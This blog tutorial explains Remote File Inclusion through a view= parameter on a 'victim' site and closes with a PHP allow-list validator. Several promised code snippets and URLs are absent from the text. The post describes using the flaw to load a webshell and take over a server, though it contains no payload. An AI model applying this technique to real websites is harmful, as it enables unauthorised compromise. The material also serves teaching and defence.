Remote File Inclusion (RFI)
Hello Guys! In this article we will learn how to exploit an RFI vulnerability. I hope you have read my previous article on Local File Inclusion; if you haven’t, please go and read that first.
Remote File Inclusion (RFI)
As the name states, if an attacker can include a remote file in the victim web app, it is called a Remote File Inclusion (RFI) vulnerability. Take a look at this piece of code:
As you can see, the first line extracts the file parameter value from the HTTP request made by the user, while the second line utilizes this value to set the file name. If the input is not sanitized properly, it can be used to include a malicious file from a remote server.
Here’s some vulnerable JSP code:
Again, if the input is not sanitized properly, it can be used to include a malicious file from a remote server. RFI is not a common vulnerability at all, but it is very dangerous when exploited. Now you must be wondering how to exploit this vulnerability. Hold on, I will demonstrate it with a real-life example. We have a URL here,
Let’s break things down:
- www.victim.com is the target website
- file.php is a webpage with the parameter view=
- For example if the user wants to view a document related to animals, the webpage file.php loads it via the view= parameter.
Take a close look at view=. If it were including local files, like view=/files/animals.php, we would have tested for Local File Inclusion. But as we can see, it’s including files from docs.example.com, which is a different website. That means it loads files from another website, so it may include a malicious file too. Enough theory! So here’s the vulnerable parameter
Now I will try to load an image by submitting its URL like this
See? How easy is that? With a webshell you can take over their website or even the whole server.
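On the defensive side, the "not sanitized properly" condition described above is closed by validating view= against the one host the page is meant to load from. The following is an added example, not code from the original article; the function name, the HTTPS requirement and the path pattern are assumptions built around the article's docs.example.com, and the sample inputs are constructed.

```php
<?php
// Added example, not the article's code. The host, the path pattern and the
// function name are assumptions built around the article's docs.example.com.
const ALLOWED_HOST = 'docs.example.com';

// Returns the URL if `view` names a document on the one trusted host, else null.
function validate_view_param(string $view): ?string
{
    // Whitespace, control bytes and backslashes are parsed differently by
    // different URL libraries, so refuse them outright.
    if (preg_match('/[\x00-\x20\x7f\\\\]/', $view)) {
        return null;
    }
    $p = parse_url($view);
    if ($p === false || !isset($p['scheme'], $p['host'], $p['path'])) {
        return null; // malformed, relative, or missing a path
    }
    if (strtolower($p['scheme']) !== 'https') {
        return null; // only https is accepted; every other scheme is refused
    }
    if (strtolower($p['host']) !== ALLOWED_HOST) {
        return null; // exact match: no suffix or substring comparison
    }
    if (isset($p['user']) || isset($p['pass']) || isset($p['port'])
        || isset($p['query']) || isset($p['fragment'])) {
        return null; // no userinfo, alternate ports or extra parameters
    }
    // Assumed document layout: /dir/name.ext with a conservative character set.
    if (!preg_match('#^(/[A-Za-z0-9_-]+)+\.[A-Za-z0-9]+$#', $p['path'])) {
        return null;
    }
    return $view;
}

// Constructed sample inputs: only the first one is accepted.
$samples = [
    'https://docs.example.com/files/animals.php',
    'http://docs.example.com/files/animals.php',
    'https://docs.example.com.other.test/files/animals.php',
    'https://docs.example.com@other.test/files/animals.php',
    'https://other.test/?x=docs.example.com/files/animals.php',
    '/files/animals.php',
];
foreach ($samples as $s) {
    printf("%-6s %s\n", validate_view_param($s) === null ? 'reject' : 'accept', $s);
}
```

Even for an accepted URL, fetch the document as data and output it escaped rather than passing it to include; setting allow_url_include = Off in php.ini stops include from fetching remote URLs at all.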
Also Read : File Inclusion Attack